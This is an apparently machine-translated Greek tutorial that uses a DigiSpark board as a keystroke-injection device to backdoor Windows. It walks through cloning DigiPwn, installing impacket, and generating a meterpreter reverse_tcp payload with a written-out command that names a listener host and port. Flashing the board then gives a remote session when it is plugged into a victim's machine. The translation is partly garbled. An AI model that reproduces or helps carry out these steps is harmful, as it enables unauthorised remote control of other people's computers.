DigiPwn: 5 βήματα

2025 Συγγραφέας: John Day | [email protected]. Τελευταία τροποποίηση: 2025-01-13 06:57

Τι κάνουμε λοιπόν εδώ;

Το DigiSpark είναι ένα μικρό εργαλείο ανάπτυξης που βασίζεται σε Arduino και μπορεί να λειτουργήσει ως είσοδος πληκτρολογίου HID. Σήμερα χειριζόμαστε αυτήν τη συσκευή για να κάνουμε backdoor ένα λειτουργικό σύστημα Windows!

Προμήθειες

Arduino IDE

Μηχανή παραθύρων

DigiSpark

Πλαίσιο Metasploit

Python 2.7 (Σημείωση: Χρειάζεστε python "2.7" μην χρησιμοποιείτε άλλη έκδοση)

πακέτο

Εγκέφαλος! Βοηθάει

Βήμα 1: Κλωνοποιήστε το αποθετήριο DigiPwn

Κλωνοποιήστε το repo του GitHub του DigiPwn από

git clone

Τώρα αλλάξτε τον κατάλογο σε DigiPwn by

cd DigiPwn/

Βήμα 2: Εγκατάσταση Impacket [Απαιτούνται μονάδες από την Python]

Αυτή η ενότητα απαιτείται για την εκτέλεση του διακομιστή SMB που απαιτείται για τη βιβλιοθήκη ωφέλιμου φορτίου

sudo apt-get install python-impacket

Or μπορείτε να κατεβάσετε τη βιβλιοθήκη impacket και να την εγκαταστήσετε από εδώ.

Βήμα 3: Ας δημιουργήσουμε το ωφέλιμο φορτίο

Τρέξιμο

python DigiPwn.py [HOST] [PORT] [PAYLOAD] [FUTLE OUTPUT] [format]

πρώην

python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs

Τώρα θα ερωτηθείτε εάν πρέπει να ξεκινήσετε το διακομιστή stager και SMB. Πατήστε y και πατήστε enter

Βήμα 4: Τώρα ανεβάστε τον κώδικα στο Arduino

Πριν από τη μεταφόρτωση, πρέπει να βεβαιωθούμε ότι ο πίνακας DigiSpark είναι εγκατεστημένος στο Arduino για να το κάνετε αυτό, δείτε εδώ.

μετά ανεβάστε το αρχείο keystroke_inject.ino που δημιουργήθηκε από το σενάριο. Μόλις τελειώσετε είστε έτοιμοι

Βήμα 5: Timeρα να συνδέσετε το μωρό

Συνδέστε το DigiSpark σας τώρα και περιμένετε 10 δευτερόλεπτα

BOOM Ξεκίνησε μια συνεδρία μετρητή!